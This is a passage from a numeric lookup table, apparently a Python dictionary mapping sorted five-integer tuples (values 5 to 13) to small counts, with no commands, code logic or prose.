(5, 7, 9, 11, 12): 4,
(5, 7, 9, 11, 13): 11,
(5, 7, 9, 12, 12): 7,
(5, 7, 9, 12, 13): 9,
(5, 7, 9, 13, 13): 3,
(5, 7, 10, 10, 10): 6,
(5, 7, 10, 10, 11): 7,
(5, 7, 10, 10, 12): 8,
(5, 7, 10, 10, 13): 7,
(5, 7, 10, 11, 11): 8,
(5, 7, 10, 11, 12): 12,
(5, 7, 10, 11, 13): 6,
(5, 7, 10, 12, 12): 4,
(5, 7, 10, 12, 13): 10,
(5, 7, 10, 13, 13): 7,
(5, 7, 11, 11, 11): 3,
(5, 7, 11, 11, 12): 9,
(5, 7, 11, 12, 12): 7,
(5, 7, 11, 12, 13): 9,
(5, 7, 11, 13, 13): 2,
(5, 7, 12, 12, 12): 5,
(5, 7, 12, 12, 13): 6,
(5, 7, 12, 13, 13): 4,
(5, 7, 13, 13, 13): 1,
(5, 8, 8, 8, 8): 1,
(5, 8, 8, 8, 9): 2,
(5, 8, 8, 8, 10): 4,
(5, 8, 8, 8, 11): 2,
(5, 8, 8, 8, 12): 2,
(5, 8, 8, 8, 13): 2,
(5, 8, 8, 9, 9): 3,
(5, 8, 8, 9, 10): 9,
(5, 8, 8, 9, 11): 6,
(5, 8, 8, 9, 12): 4,
(5, 8, 8, 9, 13): 7,
(5, 8, 8, 10, 10): 5,
(5, 8, 8, 10, 11): 4,
(5, 8, 8, 10, 12): 14,
(5, 8, 8, 10, 13): 7,
(5, 8, 8, 11, 11): 2,
(5, 8, 8, 11, 12): 3,
(5, 8, 8, 11, 13): 10,
(5, 8, 8, 12, 12): 1,
(5, 8, 8, 12, 13): 1,
(5, 8, 9, 9, 9): 2,
(5, 8, 9, 9, 10): 2,
(5, 8, 9, 9, 11): 7,
(5, 8, 9, 9, 12): 8,
(5, 8, 9, 9, 13): 4,
(5, 8, 9, 10, 10): 6,
(5, 8, 9, 10, 11): 13,
(5, 8, 9, 10, 12): 5,
(5, 8, 9, 10, 13): 6,
(5, 8, 9, 11, 11): 2,
(5, 8, 9, 11, 12): 13,
(5, 8, 9, 11, 13): 7,
(5, 8, 9, 12, 12): 12,
(5, 8, 9, 12, 13): 9,
(5, 8, 9, 13, 13): 3,
(5, 8, 10, 10, 10): 5,
(5, 8, 10, 10, 11): 7,
(5, 8, 10, 10, 12): 10,
(5, 8, 10, 10, 13): 4,
(5, 8, 10, 11, 11): 6,
(5, 8, 10, 11, 12): 12,
(5, 8, 10, 11, 13): 4,
(5, 8, 10, 12, 12): 14,
(5, 8, 10, 12, 13): 15,
(5, 8, 10, 13, 13): 10,
(5, 8, 11, 11, 11): 4,
(5, 8, 11, 11, 12): 4,
(5, 8, 11, 11, 13): 2,
(5, 8, 11, 12, 12): 5,
(5, 8, 11, 12, 13): 12,
(5, 8, 11, 13, 13): 5,
(5, 8, 12, 12, 12): 2,
(5, 8, 12, 12, 13): 1,
(5, 8, 12, 13, 13): 3,
(5, 8, 13, 13, 13): 3,
(5, 9, 9, 9, 10): 2,
(5, 9, 9, 9, 12): 3,
(5, 9, 9, 10, 10): 1,
(5, 9, 9, 10, 11): 3,
(5, 9, 9, 10, 12): 9,
(5, 9, 9, 10, 13): 5,
(5, 9, 9, 11, 11): 3,
(5, 9, 9, 11, 12): 9,
(5, 9, 9, 11, 13): 2,
(5, 9, 9, 12, 12): 6,
(5, 9, 9, 12, 13): 8,
(5, 9, 9, 13, 13): 1,
(5, 9, 10, 10, 10): 1,
(5, 9, 10, 10, 11): 2,
(5, 9, 10, 10, 12): 7,
(5, 9, 10, 10, 13): 10,
(5, 9, 10, 11, 11): 5,
(5, 9, 10, 11, 12): 12,
(5, 9, 10, 11, 13): 8,
(5, 9, 10, 12, 12): 10,
(5, 9, 10, 12, 13): 10,
(5, 9, 10, 13, 13): 4,
(5, 9, 11, 11, 11): 1,
(5, 9, 11, 11, 12): 5,
(5, 9, 11, 11, 13): 5,
(5, 9, 11, 12, 12): 5,
(5, 9, 11, 12, 13): 3,
(5, 9, 11, 13, 13): 2,
(5, 9, 12, 12, 12): 1,
(5, 9, 12, 12, 13): 3,
(5, 9, 12, 13, 13): 2,
(5, 10, 10, 10, 10): 1,
(5, 10, 10, 10, 11): 4,
(5, 10, 10, 10, 12): 3,
(5, 10, 10, 10, 13): 3,
(5, 10, 10, 11, 11): 2,
(5, 10, 10, 11, 12): 3,
(5, 10, 10, 11, 13): 5,
(5, 10, 10, 12, 12): 2,
(5, 10, 10, 12, 13): 4,
(5, 10, 10, 13, 13): 2,
(5, 10, 11, 11, 12): 2,
(5, 10, 11, 11, 13): 7,
(5, 10, 11, 12, 12): 1,
(5, 10, 11, 12, 13): 9,
(5, 10, 11, 13, 13): 3,
(5, 10, 12, 12, 12): 3,
(5, 10, 12, 12, 13): 4,
(5, 10, 12, 13, 13): 5,
(5, 10, 13, 13, 13): 2,
(5, 11, 11, 11, 12): 1,
(5, 11, 11, 11, 13): 2,
(5, 11, 11, 12, 12): 3,
(5, 11, 11, 12, 13): 4,
(5, 11, 11, 13, 13): 1,
(5, 11, 12, 12, 12): 2,
(5, 11, 12, 12, 13): 3,
(5, 11, 12, 13, 13): 9,
(5, 11, 13, 13, 13): 2,
(5, 12, 12, 12, 13): 1,
(5, 12, 12, 13, 13): 1,
(5, 12, 13, 13, 13): 1,
(6, 6, 6, 6, 6): 1,
(6, 6, 6, 6, 7): 2,
(6, 6, 6, 6, 8): 1,
(6, 6, 6, 6, 9): 2,
(6, 6, 6, 6, 10): 2,
(6, 6, 6, 6, 11): 2,
(6, 6, 6, 6, 12): 3,
(6, 6, 6, 6, 13): 1,
(6, 6, 6, 7, 7): 8,
(6, 6, 6, 7, 8): 9,
(6, 6, 6, 7, 9): 2,
(6, 6, 6, 7, 10): 2,
(6, 6, 6, 7, 11): 4,
(6, 6, 6, 7, 12): 5,
(6, 6, 6, 7, 13): 9,
(6, 6, 6, 8, 8): 2,
(6, 6, 6, 8, 9): 9,
(6, 6, 6, 8, 10): 3,
(6, 6, 6, 8, 11): 2,
(6, 6, 6, 8, 12): 10,
(6, 6, 6, 8, 13): 4,
(6, 6, 6, 9, 9): 3,
(6, 6, 6, 9, 10): 5,
(6, 6, 6, 9, 11): 5,
(6, 6, 6, 9, 12): 10,
(6, 6, 6, 9, 13): 3,
(6, 6, 6, 10, 10): 1,
(6, 6, 6, 10, 11): 2,
(6, 6, 6, 10, 12): 4,
(6, 6, 6, 10, 13): 2,
(6, 6, 6, 11, 11): 1,
(6, 6, 6, 11, 12): 3,
(6, 6, 6, 11, 13): 4,
(6, 6, 6, 12, 12): 6,
(6, 6, 6, 12, 13): 3,
(6, 6, 6, 13, 13): 2,
(6, 6, 7, 7, 7): 8,
(6, 6, 7, 7, 8): 13,
(6, 6, 7, 7, 9): 4,
(6, 6, 7, 7, 11): 1,
(6, 6, 7, 7, 12): 10,
(6, 6, 7, 7, 13): 2,
(6, 6, 7, 8, 8): 4,
(6, 6, 7, 8, 9): 17,
(6, 6, 7, 8, 10): 7,
(6, 6, 7, 8, 11): 3,
(6, 6, 7, 8, 12): 9,
(6, 6, 7, 8, 13): 8,
(6, 6, 7, 9, 9): 8,
(6, 6, 7, 9, 10): 14,
(6, 6, 7, 9, 11): 4,
(6, 6, 7, 9, 12): 13,
(6, 6, 7, 9, 13): 4,
(6, 6, 7, 10, 10): 7,
(6, 6, 7, 10, 11): 12,
(6, 6, 7, 10, 12): 8,
(6, 6, 7, 10, 13): 2,
(6, 6, 7, 11, 11): 5,
(6, 6, 7, 11, 12): 11,
(6, 6, 7, 11, 13): 6,
(6, 6, 7, 12, 12): 4,
(6, 6, 7, 12, 13): 14,
(6, 6, 7, 13, 13): 7,
(6, 6, 8, 8, 8): 2,
(6, 6, 8, 8, 9): 7,
(6, 6, 8, 8, 10): 8,
(6, 6, 8, 8, 11): 4,
(6, 6, 8, 8, 12): 11,
(6, 6, 8, 8, 13): 2,
(6, 6, 8, 9, 9): 6,
(6, 6, 8, 9, 10): 11,
(6, 6, 8, 9, 11): 8,
(6, 6, 8, 9, 12): 16,
(6, 6, 8, 9, 13): 5,
(6, 6, 8, 10, 10): 6,
(6, 6, 8, 10, 11): 8,
(6, 6, 8, 10, 12): 17,
(6, 6, 8, 10, 13): 7,
(6, 6, 8, 11, 11): 3,
(6, 6, 8, 11, 12): 8,
(6, 6, 8, 11, 13): 5,
(6, 6, 8, 12, 12): 7,
(6, 6, 8, 12, 13): 6,
(6, 6, 8, 13, 13): 1,
(6, 6, 9, 9, 9): 4,
(6, 6, 9, 9, 10): 7,
(6, 6, 9, 9, 11): 8,
(6, 6, 9, 9, 12): 13,
(6, 6, 9, 9, 13): 3,
(6, 6, 9, 10, 10): 2,
(6, 6, 9, 10, 11): 8,
(6, 6, 9, 10, 12): 21,
(6, 6, 9, 10, 13): 7,
(6, 6, 9, 11, 11): 3,
(6, 6, 9, 11, 12): 13,
(6, 6, 9, 11, 13): 6,
(6, 6, 9, 12, 12): 15,
(6, 6, 9, 12, 13): 4,
(6, 6, 9, 13, 13): 1,
(6, 6, 10, 10, 10): 2,
(6, 6, 10, 10, 11): 1,
(6, 6, 10, 10, 12): 12,
(6, 6, 10, 10, 13): 4,
(6, 6, 10, 11, 12): 7,
(6, 6, 10, 11, 13): 5,
(6, 6, 10, 12, 12): 13,
(6, 6, 10, 12, 13): 7,
(6, 6, 10, 13, 13): 1,
(6, 6, 11, 11, 11): 1,
(6, 6, 11, 11, 12): 3,
(6, 6, 11, 11, 13): 2,
(6, 6, 11, 12, 12): 8,
(6, 6, 11, 12, 13): 7,
(6, 6, 11, 13, 13): 1,
(6, 6, 12, 12, 12): 7,
(6, 6, 12, 12, 13): 3,
(6, 6, 12, 13, 13): 5,
(6, 6, 13, 13, 13): 2,
(6, 7, 7, 7, 7): 2,
(6, 7, 7, 7, 8): 13,
(6, 7, 7, 7, 9): 5,
(6, 7, 7, 7, 10): 3,
(6, 7, 7, 7, 11): 3,
(6, 7, 7, 7, 12): 4,
(6, 7, 7, 7, 13): 9,
(6, 7, 7, 8, 8): 8,
(6, 7, 7, 8, 9): 10,
(6, 7, 7, 8, 10): 8,
(6, 7, 7, 8, 11): 5,
(6, 7, 7, 8, 12): 9,
(6, 7, 7, 8, 13): 7,
(6, 7, 7, 9, 9): 8,
(6, 7, 7, 9, 10): 12,
(6, 7, 7, 9, 11): 8,
(6, 7, 7, 9, 12): 10,
(6, 7, 7, 9, 13): 5,
(6, 7, 7, 10, 10): 3,
(6, 7, 7, 10, 11): 12,
(6, 7, 7, 10, 12): 13,
(6, 7, 7, 10, 13): 2,
(6, 7, 7, 11, 11): 5,
(6, 7, 7, 11, 12): 12,
(6, 7, 7, 11, 13): 4,
(6, 7, 7, 12, 12): 4,
(6, 7, 7, 12, 13): 12,
(6, 7, 7, 13, 13): 7,
(6, 7, 8, 8, 8): 5,
(6, 7, 8, 8, 9): 6,
(6, 7, 8, 8, 10): 10,
(6, 7, 8, 8, 11): 4,
(6, 7, 8, 8, 12): 10,
(6, 7, 8, 8, 13): 10,
(6, 7, 8, 9, 9): 9,
(6, 7, 8, 9, 10): 11,
(6, 7, 8, 9, 11): 14,
(6, 7, 8, 9, 12): 21,
(6, 7, 8, 9, 13): 16,
(6, 7, 8, 10, 10): 6,
(6, 7, 8, 10, 11): 14,
(6, 7, 8, 10, 12): 17,
(6, 7, 8, 10, 13): 8,
(6, 7, 8, 11, 11): 6,
(6, 7, 8, 11, 12): 12,
(6, 7, 8, 11, 13): 7,
(6, 7, 8, 12, 12): 15,
(6, 7, 8, 12, 13): 9,
(6, 7, 8, 13, 13): 7,
(6, 7, 9, 9, 9): 6,
(6, 7, 9, 9, 10): 8,
(6, 7, 9, 9, 11): 11,
(6, 7, 9, 9, 12): 13,
(6, 7, 9, 9, 13): 6,
(6, 7, 9, 10, 10): 6,
(6, 7, 9, 10, 11): 9,
(6, 7, 9, 10, 12): 17,
(6, 7, 9, 10, 13): 17,
(6, 7, 9, 11, 11): 4,
(6, 7, 9, 11, 12): 10,
(6, 7, 9, 11, 13): 7,
(6, 7, 9, 12, 12): 15,
(6, 7, 9, 12, 13): 11,
(6, 7, 9, 13, 13): 1,
(6, 7, 10, 10, 10): 3,
(6, 7, 10, 10, 11): 6,
(6, 7, 10, 10, 12): 6,
(6, 7, 10, 10, 13): 5,
(6, 7, 10, 11, 11): 4,
(6, 7, 10, 11, 12): 16,
(6, 7, 10, 11, 13): 8,
(6, 7, 10, 12, 12): 16,
(6, 7, 10, 12, 13): 11,
(6, 7, 10, 13, 13): 3,
(6, 7, 11, 11, 11): 3,
(6, 7, 11, 11, 12): 6,
(6, 7, 11, 11, 13): 7,
(6, 7, 11, 12, 12): 8,
(6, 7, 11, 12, 13): 13,
(6, 7, 11, 13, 13): 4,
(6, 7, 12, 12, 12): 7,
(6, 7, 12, 12, 13): 9,
(6, 7, 12, 13, 13): 5,
(6, 7, 13, 13, 13): 6,
(6, 8, 8, 8, 8): 2,
(6, 8, 8, 8, 9): 2,
(6, 8, 8, 8, 10): 5,
(6, 8, 8, 8, 11): 3,
(6, 8, 8, 8, 12): 4,
(6, 8, 8, 8, 13): 3,
(6, 8, 8, 9, 10): 6,
(6, 8, 8, 9, 11): 7,
(6, 8, 8, 9, 12): 16,
(6, 8, 8, 9, 13): 4,
(6, 8, 8, 10, 10): 5,
(6, 8, 8, 10, 11): 4,
(6, 8, 8, 10, 12): 12,
(6, 8, 8, 10, 13): 6,
(6, 8, 8, 11, 11): 1,
(6, 8, 8, 11, 12): 7,
(6, 8, 8, 11, 13): 6,
(6, 8, 8, 12, 12): 6,
(6, 8, 8, 12, 13): 6,
(6, 8, 8, 13, 13): 1,
(6, 8, 9, 9, 9): 4,
(6, 8, 9, 9, 10): 8,
(6, 8, 9, 9, 11): 8,
(6, 8, 9, 9, 12): 12,
(6, 8, 9, 9, 13): 5,
(6, 8, 9, 10, 10): 7,
(6, 8, 9, 10, 11): 8,
(6, 8, 9, 10, 12): 18,
(6, 8, 9, 10, 13): 9,
(6, 8, 9, 11, 11): 9,
(6, 8, 9, 11, 12): 7,
(6, 8, 9, 11, 13): 12,
(6, 8, 9, 12, 12): 19,
(6, 8, 9, 12, 13): 10,
(6, 8, 9, 13, 13): 2,
(6, 8, 10, 10, 10): 5,
(6, 8, 10, 10, 11): 8,
(6, 8, 10, 10, 12): 11,
(6, 8, 10, 10, 13): 4,
(6, 8, 10, 11, 11): 3,
(6, 8, 10, 11, 12): 14,
(6, 8, 10, 11, 13): 10,
(6, 8, 10, 12, 12): 17,
(6, 8, 10, 12, 13): 13,
(6, 8, 10, 13, 13): 5,
(6, 8, 11, 11, 11): 1,
(6, 8, 11, 11, 12): 6,
(6, 8, 11, 11, 13): 4,
(6, 8, 11, 12, 12): 15,
(6, 8, 11, 12, 13): 5,
(6, 8, 11, 13, 13): 2,
(6, 8, 12, 12, 12): 10,
(6, 8, 12, 12, 13): 7,
(6, 8, 12, 13, 13): 3,
(6, 8, 13, 13, 13): 1,
(6, 9, 9, 9, 9): 2,
(6, 9, 9, 9, 10): 1,
(6, 9, 9, 9, 11): 4,
(6, 9, 9, 9, 12): 3,
(6, 9, 9, 9, 13): 9,
(6, 9, 9, 10, 10): 1,
(6, 9, 9, 10, 11): 5,
(6, 9, 9, 10, 12): 11,
(6, 9, 9, 10, 13): 5,
(6, 9, 9, 11, 11): 4,
(6, 9, 9, 11, 12): 11,
(6, 9, 9, 11, 13): 4,
(6, 9, 9, 12, 12): 7,
(6, 9, 9, 12, 13): 9,
(6, 9, 9, 13, 13): 2,
(6, 9, 10, 10, 10): 1,
(6, 9, 10, 10, 11): 3,
(6, 9, 10, 10, 12): 10,
(6, 9, 10, 10, 13): 5,
(6, 9, 10, 11, 11): 3,
(6, 9, 10, 11, 12): 12,
(6, 9, 10, 11, 13): 17,
(6, 9, 10, 12, 12): 8,
(6, 9, 10, 12, 13): 9,
(6, 9, 10, 13, 13): 4,
(6, 9, 11, 11, 11): 2,
(6, 9, 11, 11, 12): 4,
(6, 9, 11, 11, 13): 5,
(6, 9, 11, 12, 12): 10,
(6, 9, 11, 12, 13): 13,
(6, 9, 11, 13, 13): 1,
(6, 9, 12, 12, 12): 11,
(6, 9, 12, 12, 13): 11,
(6, 9, 12, 13, 13): 2,
(6, 9, 13, 13, 13): 4,
(6, 10, 10, 10, 12): 4,
(6, 10, 10, 10, 13): 1,
(6, 10, 10, 11, 11): 1,
(6, 10, 10, 11, 12): 4,
(6, 10, 10, 11, 13): 5,
(6, 10, 10, 12, 12): 5,
(6, 10, 10, 12, 13): 9,
(6, 10, 10, 13, 13): 1,
(6, 10, 11, 11, 11): 1,
(6, 10, 11, 11, 12): 2,
(6, 10, 11, 11, 13): 2,
(6, 10, 11, 12, 12): 5,
(6, 10, 11, 12, 13): 7,
(6, 10, 11, 13, 13): 6,
(6, 10, 12, 12, 12): 6,
(6, 10, 12, 12, 13): 14,
(6, 10, 12, 13, 13): 5,
(6, 10, 13, 13, 13): 1,
(6, 11, 11, 11, 13): 2,
(6, 11, 11, 12, 12): 2,
(6, 11, 11, 12, 13): 6,
(6, 11, 11, 13, 13): 2,
(6, 11, 12, 12, 12): 2,
(6, 11, 12, 12, 13): 7,
(6, 11, 12, 13, 13): 5,
(6, 11, 13, 13, 13): 1,
(6, 12, 12, 12, 12): 1,
(6, 12, 12, 12, 13): 1,
(7, 7, 7, 7, 7): 1,
(7, 7, 7, 7, 8): 4,
(7, 7, 7, 7, 9): 3,
(7, 7, 7, 7, 11): 2,
(7, 7, 7, 7, 12): 2,
(7, 7, 7, 7, 13): 1,
(7, 7, 7, 8, 8): 2,
(7, 7, 7, 8, 9): 2,
(7, 7, 7, 8, 10): 3,
(7, 7, 7, 8, 11): 1,
(7, 7, 7, 8, 12): 3,
(7, 7, 7, 8, 13): 6,
(7, 7, 7, 9, 9): 1,
(7, 7, 7, 9, 10): 5,
(7, 7, 7, 9, 11): 4,
(7, 7, 7, 9, 12): 7,
(7, 7, 7, 9, 13): 3,
(7, 7, 7, 10, 10): 2,
(7, 7, 7, 10, 11): 5,
(7, 7, 7, 10, 12): 3,
(7, 7, 7, 10, 13): 1,
(7, 7, 7, 11, 11): 1,
(7, 7, 7, 11, 12): 2,
(7, 7, 7, 11, 13): 3,
(7, 7, 7, 12, 12): 2,
(7, 7, 7, 12, 13): 1,
(7, 7, 7, 13, 13): 2,
(7, 7, 8, 8, 8): 4,
(7, 7, 8, 8, 9): 3,
(7, 7, 8, 8, 10): 3,
(7, 7, 8, 8, 11): 2,
(7, 7, 8, 8, 12): 4,
(7, 7, 8, 8, 13): 3,
(7, 7, 8, 9, 9): 2,
(7, 7, 8, 9, 10): 8,
(7, 7, 8, 9, 11): 8,
(7, 7, 8, 9, 12): 8,
(7, 7, 8, 9, 13): 3,
(7, 7, 8, 10, 10): 7,
(7, 7, 8, 10, 11): 8,
(7, 7, 8, 10, 12): 7,
(7, 7, 8, 10, 13): 7,
(7, 7, 8, 11, 11): 3,
(7, 7, 8, 11, 12): 3,
(7, 7, 8, 11, 13): 4,
(7, 7, 8, 12, 12): 5,
(7, 7, 8, 12, 13): 5,
(7, 7, 8, 13, 13): 4,
(7, 7, 9, 9, 9): 1,
(7, 7, 9, 9, 10): 4,
(7, 7, 9, 9, 11): 2,
(7, 7, 9, 9, 12): 9,
(7, 7, 9, 9, 13): 3,
(7, 7, 9, 10, 10): 1,
(7, 7, 9, 10, 11): 5,
(7, 7, 9, 10, 12): 8,
(7, 7, 9, 10, 13): 5,
(7, 7, 9, 11, 11): 4,
(7, 7, 9, 11, 12): 6,
(7, 7, 9, 11, 13): 6,
(7, 7, 9, 12, 12): 4,
(7, 7, 9, 12, 13): 2,
(7, 7, 10, 10, 10): 1,
(7, 7, 10, 10, 11): 3,
(7, 7, 10, 10, 12): 4,
(7, 7, 10, 10, 13): 5,
(7, 7, 10, 11, 12): 5,
(7, 7, 10, 11, 13): 5,
(7, 7, 10, 12, 12): 3,
(7, 7, 10, 12, 13): 3,
(7, 7, 10, 13, 13): 1,
(7, 7, 11, 11, 11): 1,
(7, 7, 11, 11, 12): 1,
(7, 7, 11, 11, 13): 3,
(7, 7, 11, 12, 12): 3,
(7, 7, 11, 12, 13): 4,
(7, 7, 11, 13, 13): 1,
(7, 7, 12, 12, 12): 2,
(7, 7, 12, 12, 13): 2,
(7, 7, 12, 13, 13): 2,
(7, 7, 13, 13, 13): 2,
(7, 8, 8, 8, 8): 1,
(7, 8, 8, 8, 11): 1,
(7, 8, 8, 8, 12): 3,
(7, 8, 8, 8, 13): 3,
(7, 8, 8, 9, 9): 1,
(7, 8, 8, 9, 10): 6,
(7, 8, 8, 9, 11): 3,
(7, 8, 8, 9, 12): 4,
(7, 8, 8, 9, 13): 7,
(7, 8, 8, 10, 10): 5,
(7, 8, 8, 10, 11): 4,
(7, 8, 8, 10, 12): 8,
(7, 8, 8, 10, 13): 3,
(7, 8, 8, 11, 11): 4,
(7, 8, 8, 11, 13): 3,
(7, 8, 8, 12, 12): 1,
(7, 8, 8, 12, 13): 2,
(7, 8, 8, 13, 13): 1,
(7, 8, 9, 9, 9): 2,
(7, 8, 9, 9, 10): 2,
(7, 8, 9, 9, 11): 2,
(7, 8, 9, 9, 12): 8,
(7, 8, 9, 9, 13): 4,
(7, 8, 9, 10, 10): 4,
(7, 8, 9, 10, 11): 8,
(7, 8, 9, 10, 12): 14,
(7, 8, 9, 10, 13): 10,
(7, 8, 9, 11, 11): 2,
(7, 8, 9, 11, 12): 15,
(7, 8, 9, 11, 13): 4,
(7, 8, 9, 12, 12): 9,
(7, 8, 9, 12, 13): 8,
(7, 8, 9, 13, 13): 2,
(7, 8, 10, 10, 10): 2,
(7, 8, 10, 10, 11): 2,
(7, 8, 10, 10, 12): 8,
(7, 8, 10, 10, 13): 7,
(7, 8, 10, 11, 11): 5,
(7, 8, 10, 11, 12): 8,
(7, 8, 10, 11, 13): 16,
(7, 8, 10, 12, 12): 10,
(7, 8, 10, 12, 13): 7,
(7, 8, 10, 13, 13): 3,
(7, 8, 11, 11, 11): 1,
(7, 8, 11, 11, 12): 1,
(7, 8, 11, 11, 13): 5,
(7, 8, 11, 12, 12): 1,
(7, 8, 11, 12, 13): 9,
(7, 8, 11, 13, 13): 1,
(7, 8, 12, 12, 12): 4,
(7, 8, 12, 12, 13): 5,
(7, 8, 12, 13, 13): 5,
(7, 8, 13, 13, 13): 4,
(7, 9, 9, 9, 12): 7,
(7, 9, 9, 10, 10): 1,
(7, 9, 9, 10, 11): 3,
(7, 9, 9, 10, 12): 5,
(7, 9, 9, 10, 13): 10,
(7, 9, 9, 11, 11): 1,
(7, 9, 9, 11, 12): 5,
(7, 9, 9, 11, 13): 6,
(7, 9, 9, 12, 12): 7,
(7, 9, 9, 12, 13): 3,
(7, 9, 9, 13, 13): 1,
(7, 9, 10, 10, 11): 1,
(7, 9, 10, 10, 12): 6,
(7, 9, 10, 10, 13): 2,
(7, 9, 10, 11, 11): 7,
(7, 9, 10, 11, 12): 10,
(7, 9, 10, 11, 13): 4,
(7, 9, 10, 12, 12): 6,
(7, 9, 10, 12, 13): 13,
(7, 9, 10, 13, 13): 1,
(7, 9, 11, 11, 11): 1,
(7, 9, 11, 11, 12): 5,
(7, 9, 11, 11, 13): 2,
(7, 9, 11, 12, 12): 6,
(7, 9, 11, 12, 13): 5,
(7, 9, 11, 13, 13): 5,
(7, 9, 12, 12, 12): 2,
(7, 9, 12, 12, 13): 5,
(7, 9, 12, 13, 13): 3,
(7, 10, 10, 10, 12): 3,
(7, 10, 10, 10, 13): 1,
(7, 10, 10, 11, 12): 5,
(7, 10, 10, 11, 13): 4,
(7, 10, 10, 12, 12): 1,
(7, 10, 10, 12, 13): 3,
(7, 10, 10, 13, 13): 5,
(7, 10, 11, 11, 12): 2,
(7, 10, 11, 11, 13): 4,
(7, 10, 11, 12, 12): 4,
(7, 10, 11, 12, 13): 7,
(7, 10, 11, 13, 13): 2,
(7, 10, 12, 12, 12): 3,
(7, 10, 12, 12, 13): 2,
(7, 10, 12, 13, 13): 7,
(7, 10, 13, 13, 13): 2,
(7, 11, 11, 11, 12): 1,
(7, 11, 11, 11, 13): 2,
(7, 11, 11, 12, 12): 1,
(7, 11, 11, 12, 13): 5,
(7, 11, 11, 13, 13): 3,
(7, 11, 12, 12, 13): 8,
(7, 11, 12, 13, 13): 1,
(7, 12, 12, 12, 12): 1,
(7, 12, 12, 12, 13): 1,
(7, 12, 13, 13, 13): 1,
(8, 8, 8, 8, 10): 1,
(8, 8, 8, 8, 12): 1,
(8, 8, 8, 8, 13): 1,
(8, 8, 8, 9, 9): 1,
(8, 8, 8, 9, 10): 1,
(8, 8, 8, 9, 12): 2,
(8, 8, 8, 9, 13): 1,
(8, 8, 8, 10, 10): 2,
(8, 8, 8, 10, 11): 4,
(8, 8, 8, 10, 12): 3,
(8, 8, 8, 10, 13): 2,
(8, 8, 8, 11, 11): 1,
(8, 8, 8, 11, 12): 1,
(8, 8, 8, 11, 13): 1,
(8, 8, 8, 12, 12): 1,
(8, 8, 8, 12, 13): 1,
(8, 8, 9, 9, 11): 3,
(8, 8, 9, 9, 12): 1,
(8, 8, 9, 9, 13): 1,
(8, 8, 9, 10, 11): 4,
(8, 8, 9, 10, 12): 8,
(8, 8, 9, 10, 13): 3,
(8, 8, 9, 11, 11): 2,
(8, 8, 9, 11, 12): 1,
(8, 8, 9, 11, 13): 8,
(8, 8, 9, 12, 12): 3,
(8, 8, 9, 12, 13): 1,
(8, 8, 9, 13, 13): 1,
(8, 8, 10, 10, 10): 1,
(8, 8, 10, 10, 12): 5,
(8, 8, 10, 10, 13): 4,
(8, 8, 10, 11, 11): 1,
(8, 8, 10, 11, 12): 7,
(8, 8, 10, 11, 13): 3,
(8, 8, 10, 12, 12): 2,
(8, 8, 10, 12, 13): 8,
(8, 8, 10, 13, 13): 3,
(8, 8, 11, 11, 11): 1,
(8, 8, 11, 11, 13): 3,
(8, 8, 11, 13, 13): 2,
(8, 8, 12, 12, 12): 2,
(8, 8, 12, 12, 13): 1,
(8, 9, 9, 9, 12): 3,
(8, 9, 9, 9, 13): 1,
(8, 9, 9, 10, 11): 1,
(8, 9, 9, 10, 12): 5,
(8, 9, 9, 10, 13): 3,
(8, 9, 9, 11, 11): 1,
(8, 9, 9, 11, 12): 4,
(8, 9, 9, 11, 13): 4,
(8, 9, 9, 12, 12): 2,
(8, 9, 9, 12, 13): 7,
(8, 9, 10, 10, 10): 1,
(8, 9, 10, 10, 11): 3,
(8, 9, 10, 10, 12): 2,
(8, 9, 10, 10, 13): 4,
(8, 9, 10, 11, 11): 1,
(8, 9, 10, 11, 12): 4,
(8, 9, 10, 11, 13): 6,
(8, 9, 10, 12, 12): 12,
(8, 9, 10, 12, 13): 1,
(8, 9, 10, 13, 13): 3,
(8, 9, 11, 11, 11): 1,
(8, 9, 11, 11, 12): 5,
(8, 9, 11, 11, 13): 1,
(8, 9, 11, 12, 12): 6,
(8, 9, 11, 12, 13): 7,
(8, 9, 11, 13, 13): 3,
(8, 9, 12, 12, 13): 1,
(8, 10, 10, 10, 11): 1,
(8, 10, 10, 10, 12): 2,
(8, 10, 10, 10, 13): 1,
(8, 10, 10, 11, 11): 1,
(8, 10, 10, 11, 12): 4,
(8, 10, 10, 11, 13): 5,
(8, 10, 10, 12, 12): 3,
(8, 10, 10, 12, 13): 5,
(8, 10, 10, 13, 13): 1,
(8, 10, 11, 11, 13): 3,
(8, 10, 11, 12, 12): 4,
(8, 10, 11, 12, 13): 6,
(8, 10, 11, 13, 13): 5,
(8, 10, 12, 12, 12): 4,
(8, 10, 12, 12, 13): 1,
(8, 10, 12, 13, 13): 3,
(8, 10, 13, 13, 13): 1,
(8, 11, 11, 11, 13): 2,
(8, 11, 11, 12, 13): 3,
(8, 11, 11, 13, 13): 1,
(8, 11, 12, 12, 13): 5,
(8, 11, 12, 13, 13): 5,
(8, 11, 13, 13, 13): 3,
(8, 12, 12, 12, 12): 1,
(8, 12, 12, 12, 13): 2,
(8, 12, 12, 13, 13): 1,
(8, 13, 13, 13, 13): 1,
(9, 9, 9, 9, 12): 1,
(9, 9, 9, 10, 11): 1,
(9, 9, 9, 10, 12): 1,
(9, 9, 9, 11, 12): 3,
(9, 9, 9, 12, 12): 2,
(9, 9, 9, 12, 13): 4,
(9, 9, 10, 11, 12): 2,
(9, 9, 10, 11, 13): 4,
(9, 9, 10, 12, 12): 2,
(9, 9, 10, 12, 13): 4,
(9, 9, 10, 13, 13): 4,
(9, 9, 11, 11, 11): 1,
(9, 9, 11, 11, 12): 2,
(9, 9, 11, 11, 13): 2,
(9, 9, 11, 12, 12): 3,
(9, 9, 11, 12, 13): 4,
(9, 9, 11, 13, 13): 1,
(9, 9, 12, 12, 13): 1,
(9, 9, 12, 13, 13): 1,
(9, 9, 13, 13, 13): 1,
(9, 10, 10, 10, 12): 1,
(9, 10, 10, 11, 11): 2,
(9, 10, 10, 11, 12): 2,
(9, 10, 10, 12, 12): 1,
(9, 10, 10, 12, 13): 5,
(9, 10, 10, 13, 13): 1,
(9, 10, 11, 11, 11): 2,
(9, 10, 11, 11, 12): 2,
(9, 10, 11, 11, 13): 5,
(9, 10, 11, 12, 12): 3,
(9, 10, 11, 12, 13): 6,
(9, 10, 11, 13, 13): 3,
(9, 10, 12, 12, 12): 5,
(9, 10, 12, 12, 13): 3,
(9, 10, 12, 13, 13): 3,
(9, 10, 13, 13, 13): 1,
(9, 11, 11, 11, 12): 1,
(9, 11, 11, 11, 13): 1,
(9, 11, 11, 12, 13): 3,
(9, 11, 11, 13, 13): 2,
(9, 11, 12, 12, 13): 4,
(9, 12, 12, 12, 12): 1,
(9, 12, 12, 12, 13): 1,
